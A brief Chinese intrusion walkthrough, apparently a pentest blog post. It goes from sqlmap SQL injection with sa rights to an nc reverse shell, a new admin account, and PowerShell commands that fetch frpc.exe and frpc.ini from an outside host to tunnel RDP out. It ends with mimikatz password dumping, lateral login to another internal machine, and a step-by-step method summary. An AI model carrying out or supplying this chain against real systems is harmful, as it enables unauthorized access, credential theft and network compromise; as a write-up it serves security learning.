一、漏洞发现
拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入
进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限
os-shell执行命令太慢了,直接进行nc 反弹
执行base64 加密后的powershell命令,反弹回shell
nc shell下加账号和密码成功,mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线
接下来进行mstsc远程连接
使用mimikatz 抓取其密码,直接报出明文
通过arp -a 发现其内网中还有一个活跃的服务器
直接在目标机上用爆出来的密码尝试远程登录,成功登录
二、总结一下思路
1 、找到sql注入,且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器